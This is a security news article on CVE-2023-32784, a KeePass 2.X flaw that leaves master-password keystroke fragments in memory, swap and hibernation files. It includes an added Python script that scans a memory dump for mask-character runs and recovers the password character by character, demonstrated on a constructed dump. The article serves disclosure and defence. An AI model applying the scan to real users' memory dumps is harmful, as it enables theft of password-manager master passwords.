Critical vulnerability in KeePass exposes master passwords
A researcher known as “vdohney” discovered a critical vulnerability (CVE-2023-32784) in the open-source password manager KeePass.
The flaw lets an attacker who can read the application's memory recover the master password from it. At the time of writing no fixed stable release was available, yet a proof-of-concept (PoC) tool, "KeePass 2.X Master Password Dumper", had already been published.
The issue lies in SecureTextBoxEx, the custom text box KeePass uses for entering the master password and for other password fields in its edit dialogs. To exploit it with the PoC tool, the attacker needs a memory source: a dump of the KeePass process, the swap file (pagefile.sys), the hibernation file (hiberfil.sys), or a RAM dump of the whole system.
No code execution on the target is required, and the readme states that the attack works regardless of which of those sources the memory comes from. Vdohney also notes in the GitHub readme that it makes no difference whether the KeePass workspace is locked, and that the password can still be dumped from memory even after KeePass has exited, since a hibernation or swap file written while the password was in memory keeps the fragments on disk.
KeePass Master Password Dumper recovers the master password from KeePass's memory in plaintext, except for the first character, and works the same way on any of the memory sources above. The root cause is the custom password entry box, SecureTextBoxEx, which leaves a trace of the characters typed into it in memory.
The trace consists of residual strings created for each keystroke: every time a character is entered, a new string is built from the masked prefix plus the new character. .NET strings are immutable and managed, so KeePass cannot overwrite them in place; they stay on the managed heap (and in any dump, page file, or hibernation file that captures it) until the garbage collector eventually reclaims and reuses that memory, which the application cannot force. Typing "Password", for example, leaves •a, ••s, •••s, ••••w, •••••o, ••••••r and •••••••d behind. The first keystroke leaves only "P" with no mask prefix, which cannot be told apart from the rest of memory, so that position stays unknown. For every later position the PoC searches the dump for a run of mask characters followed by one more character and lists the candidates it finds for that position.
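As an added example (not vdohney's PoC and not KeePass code), the following Python script shows the recovery technique described above on a constructed dump: it writes the residual strings that a typed password would leave into a buffer of random filler bytes, then scans the buffer for runs of the mask character followed by one more character and groups the candidates by position. The function names are my own. Two assumptions are built in: .NET keeps strings in memory as UTF-16LE, and the mask character is U+25CF (BLACK CIRCLE), which this page renders as "•". The filler deliberately avoids the mask's lead byte so the run is deterministic, and the length header and terminator of real .NET string objects are not modelled. The scenario (a mistyped unlock attempt followed by two correct ones) is constructed, and it also shows why the PoC reports several candidates for a position rather than one answer.

```python
from __future__ import annotations

import random
import re
from collections import Counter, defaultdict

# Assumption: KeePass masks the box with U+25CF (BLACK CIRCLE), shown as "•"
# in the text above. .NET strings are UTF-16LE, so one mask character is the
# byte pair CF 25 in a dump.
MASK_CHAR = "\u25cf"
MASK_BYTES = MASK_CHAR.encode("utf-16-le")   # b"\xcf\x25"


def residual_strings(typed: str) -> list[str]:
    """Strings left in memory while `typed` is entered, one per keystroke
    after the first: i mask characters followed by the (i+1)-th character.
    The first keystroke leaves only the bare character, with no mask prefix
    to search for, so it is not recoverable."""
    return [MASK_CHAR * i + typed[i] for i in range(1, len(typed))]


def build_fake_dump(attempts: list[str], seed: int = 1) -> bytes:
    """Constructed stand-in for a process/RAM/hibernation dump: the residual
    strings of every typed attempt, scattered between random filler bytes.
    Filler never contains the mask's lead byte 0xCF, so it can neither fake
    nor lengthen a mask run; real string headers/terminators are omitted."""
    rnd = random.Random(seed)
    filler_alphabet = [b for b in range(256) if b != MASK_BYTES[0]]
    chunks = []
    for attempt in attempts:
        for fragment in residual_strings(attempt):
            chunks.append(bytes(rnd.choices(filler_alphabet, k=rnd.randrange(8, 64))))
            chunks.append(fragment.encode("utf-16-le"))
    chunks.append(bytes(rnd.choices(filler_alphabet, k=32)))
    return b"".join(chunks)


def scan_dump(dump: bytes) -> dict[int, Counter]:
    """Map 1-based password position -> Counter of candidate characters.
    Each maximal run of N mask characters followed by one printable UTF-16
    code unit is read as 'character N+1 of the password'."""
    run = re.compile(b"((?:" + re.escape(MASK_BYTES) + b")+)(..)", re.DOTALL)
    candidates: dict[int, Counter] = defaultdict(Counter)
    for m in run.finditer(dump):
        n_masks = len(m.group(1)) // 2          # two bytes per mask character
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch == "\ufffd" or not ch.isprintable():
            continue                            # not something a user typed
        candidates[n_masks + 1][ch] += 1
    return dict(candidates)


def best_guess(candidates: dict[int, Counter]) -> str:
    """Most frequent candidate at each position, '?' where nothing was found.
    Position 1 is always '?' (see residual_strings)."""
    if not candidates:
        return ""
    out = ["?"]
    for pos in range(2, max(candidates) + 1):
        c = candidates.get(pos)
        out.append(c.most_common(1)[0][0] if c else "?")
    return "".join(out)


if __name__ == "__main__":
    # Constructed scenario: one mistyped unlock attempt, then two correct ones.
    dump = build_fake_dump(["Passwrod", "Password", "Password"])
    found = scan_dump(dump)
    for pos in sorted(found):
        print(pos, dict(found[pos]))
    print("best guess:", best_guess(found))   # ?assword
```

Positions 6 and 7 come back with two candidates each ("o"/"r" and "r"/"o") because the typo left its own residual strings next to the correct ones; the repeated correct attempts tip the count, which is the same reasoning a person applies when reading the PoC's candidate lists. On a real dump the scan is a heuristic: a CF 25 byte pair can occur at an odd offset inside unrelated UTF-16 data, so candidates should be read as leads, not as proof.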
The flaw affects KeePass 2.X on Windows and possibly also KeePass 2.X running under Mono on Linux and macOS. The problem has been fixed in test builds of KeePass 2.54, and at the time of writing the stable release was expected in July 2023.
Because an attacker must already have a process dump, a RAM image, or the swap or hibernation file of the victim machine, the risk of widespread exploitation of CVE-2023-32784 is low. KeePassXC, a cross-platform fork of KeePassX written in C++ rather than .NET, does not share the affected code and is not impacted. Note that upgrading does not purge copies already written to pagefile.sys, hiberfil.sys, or crash dumps; anyone who suspects such a file has been captured should treat the master password as exposed and change it.
This piece draws on a report by Help Net Security.